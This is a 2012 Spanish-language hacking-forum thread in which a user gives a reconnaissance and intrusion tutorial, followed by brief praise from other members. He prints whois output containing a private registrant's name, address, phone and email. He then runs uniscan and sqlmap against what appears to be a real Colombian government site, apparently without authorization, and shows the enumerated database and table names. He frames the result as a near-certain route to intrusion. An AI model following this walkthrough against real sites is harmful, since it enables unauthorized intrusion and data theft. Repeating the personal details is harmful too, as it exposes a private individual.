comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Aglomerando informacion

  • 3 Respuestas
  • 2791 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado b4dr00t

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Abril 09, 2012, 10:12:00 pm »
Saludos foreros  de underc0de y backroot hoy vengo a prensentar un tema que a muchos nos da curiosidad. en el momento de adentrarse a un servidor lo primero alo que recurrimos creo que la mayoria lo hacemos es dar un reconocimiento de parametros vamos a intentar aglomerar toda la informacion de el servidor . que sea posible en este caso con un sencillo whois

whois Target
para visualizar informacion de el dominio tales como el dia hora en el cual se consibio el registro .  igualmente la persona que lo registro o si este paso por una empresa lleva informacion de esta tambien.

vamos para no dar un exposed de ningun sitio que no nos pertenesca hare el whois con mi propio webite

whois latinosgeek.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: LATINOSGEEK.COM
   Registrar: REGISTER.COM, INC.
   Whois Server: whois.register.com
   Referral URL: http://www.register.com
   Name Server: NS1.DIXHOST.ORG
   Name Server: NS2.DIXHOST.ORG
   Status: clientTransferProhibited
   Updated Date: 30-mar-2012
   Creation Date: 30-mar-2012
   Expiration Date: 30-mar-2013

>>> Last update of whois database: Tue, 10 Apr 2012 00:08:43 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

The data in Register.com's WHOIS database is provided to you by
Register.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record.  Register.com makes this information available "as is," and
does not guarantee its accuracy.  By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Register.com (or its systems).  The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Register.com.
Register.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.


   Registrant:
      DixHost
      Raul Lira
      Gran Jardin 257 Lomas
      Leon, Gto 37000
      MX
      Phone: +1.4772595614
      Email: soporte@dixhost.org



   Registrar Name....: Register.com
   Registrar Whois...: whois.register.com
   Registrar Homepage: www.register.com

   Domain Name: latinosgeek.com
      Created on..............: 2012-03-30
      Expires on..............: 2013-03-30

   Administrative Contact:
      DixHost
      Raul Lira
      Gran Jardin 257 Lomas
      Leon, Gto 37000
      MX
      Phone: +1.4772595614
      Email: soporte@dixhost.org


   Technical  Contact:
      Registercom
      Domain Registrar
      12808 Gran Bay Pkwy
      West Jacksonville, FL 32258
      US
      Phone: +1.9027492701
      Email: domainregistrar@register.com


   DNS Servers:
      ns2.dixhost.org
      ns1.dixhost.org


Notemos dos lineas:

Creation Date: 30-mar-2012
Expiration Date: 30-mar-2013

muestra el dia en el que fue creado el dominio y en la siguiente linea muestra cuando expirara en el caso de no ser renovado se podra bolver a comprar por otro usuario igualmente puede renovarlo el owner.

Informacion de el registrador:

      Raul Lira
      Gran Jardin 257 Lomas
      Leon, Gto 37000
      MX
      Phone: +1.4772595614
      Email: soporte@dixhost.org

aqui vendrian los datos de la persona Humana que llevo acabo la registracion de el dominio. podemos apreciar que fue en mi caso el proveedor de mi reseller actual. interpuso sus datos y registro el dominio asu nombre. muestra nombres apellidos pais telefonos etc bueno un sinfin de informacion que nos servira para el reconocimiento de el servidor a el que queremos echarle garras.

mirando posibles vulns sqli,fpd,xss.

llegamos a el momento de la accion donde podremos ver las formas de introducirnos en el servidor de forma arbitraria. aqui es donde podremos tener respaldo de t00ls como uniscan,acunetix,nikto,nessus entre otras...

abramosle paso a uniscan

project : http://www.uniscan.com.br/

bamonos a el entorno de backtrack o si usan otro sistema operativo descarguen la tool

cd /pentest/web/uniscan

no vamos a simplificar nuestra auditoria y queremos sacarle el maximo de informacion para poder, estar mas familiarisados con el servidor.

vale vamos a arrancar uniscan para que escanee el target en mi caso:

cd /pentest/web/uniscan -u http://www.ispeak.gov.co/ -qweds

-u = el target qweds = cada letra representa. una diferente accion. aqui las uso todas para un maximo provecho de el servidor y suponiendo que no se nada sobre el servidor a el que intento adentrarme.



hay comensamos nuestra odisea uniscan enlistara directorios y lanzara posibles errores que pueda tener el servidor. una maquina de auto pwned podriamos decir.



nos enlista directorios que no podrian estar en un robots.txt o sitemap  no esta demas decirles que revisen el archivo robots.txt. para ver, directorios que el administrador no quiere que las arañas de google indexeen. igual no queda de mas decir  que tambien se puede mirar el sitemap para posibles anfitrionas a sqli,xsss.



nos resalta el directorio info.php el cual tiene el archivo phpinfo que nos puede ayudar a que la intrusion sea mas facil. y a savernos orientar. para saver como esta encadenado el servidor.


nos dio a conocer posibles url con sqli que podremos explotar.

vamos. ahora, con la informacion que tenemos hasta ahora tenemos: posibles sqli, directorios a examinar y unas ganas de seguir arañando info.

vamos rapidamente a mirar los links con las posibles sqli y usemos un automatizador. en este caso vamos con sqlmap.

python sqlmap.py -u target --dbs..

  • cpaegov_cpae
  • ilervuce
  • information_schema
  • minc
  • speak
  • tarjetajoven


+------------------------+
| categories_ctg         |
| ciudad                 |
| ciudad_examen          |
| cms_banner             |
| cms_block              |
| cms_block_location     |
| cms_category           |
| cms_config             |
| cms_contact_type       |
| cms_content            |
| cms_content_type       |
| cms_language           |
| cms_log                |
| cms_plantilla          |
| cms_role               |
| cms_role_category      |
| cms_skin               |
| cms_user               |
| convocatoria           |
| departamento           |
| empresa                |
| encuesta               |
| estado_civil           |
| estado_laboral         |
| faq                    |
| faq_category           |
| gallery                |
| gallery_images         |
| institucion            |
| link                   |
| link_category          |
| link_category_has_link |
| localidad              |
| manufacturers_man      |
| news                   |
| news_type              |
| ninos                  |
| option_opt             |
| optionvalue_ova        |
| pais                   |
| paises                 |
| poll                   |
| poll_answer            |
| poll_ip                |
| productoption_pop      |
| products_prd           |
| programa_estudio       |
| reserva                |
| sector                 |
| sedes                  |
| tags                   |
| testimonios            |
| users_usr              |
| usoxford               |
| usuario                |
+------------------------+

en este caso la posible vuln sql nos ayudo a extraer la informacion de el servidor. aqui paramos. ya savemos que tenemos el 90% de posibilidad de adentrarnos a el servidor y como esto es un tutorial. no es nesesario tocar el servidor ni dañar su contenido.

conclucion.
con un poco de informacion. que se balla recolectando se pueden encadenar muchas posibilidades alejando falsos positivos y dando una alta posibilidad de la intrusion arbitraria. con lo que se tiene a mano. desde un whois hasta un directory checker se llegan a grandes peces gordos. saludos B4dr00t
« Última modificación: Agosto 08, 2014, 09:14:53 pm por Expermicid »

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #1 en: Abril 10, 2012, 06:13:17 pm »
Buen aporte! Gracias por el esfuerzo.
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« Respuesta #2 en: Abril 10, 2012, 07:53:30 pm »
exelente men x eso eres un gran pentester :)

Desconectado REC

  • *
  • Underc0der
  • Mensajes: 122
  • Actividad:
    0%
  • Reputación 0
  • o.O!
    • Ver Perfil
    • Email
« Respuesta #3 en: Abril 10, 2012, 08:01:52 pm »
Gran aporte! salu2

 

¿Te gustó el post? COMPARTILO!



Revelacion de información (information disclosure) en software de IBM

Iniciado por Rootkit_Pentester

Respuestas: 0
Vistas: 1340
Último mensaje Mayo 07, 2017, 02:52:10 pm
por Rootkit_Pentester
Domain_Analyzer la tool que te da la mayor información de un dominio

Iniciado por Rootkit_Pentester

Respuestas: 0
Vistas: 1401
Último mensaje Agosto 31, 2017, 08:43:21 pm
por Rootkit_Pentester
Footprints - Recopilar información - Reconocimiento.

Iniciado por Cl0udswX

Respuestas: 6
Vistas: 4559
Último mensaje Febrero 05, 2015, 01:20:15 pm
por kity54
[Doxing] Encontrar informacion de personas

Iniciado por arthusu

Respuestas: 6
Vistas: 6629
Último mensaje Septiembre 30, 2015, 04:27:17 am
por Asc11Panic
Footprinting (Recogo de Informacion)

Iniciado por Aryenal.Bt

Respuestas: 2
Vistas: 2135
Último mensaje Septiembre 12, 2013, 05:39:49 pm
por codeYgo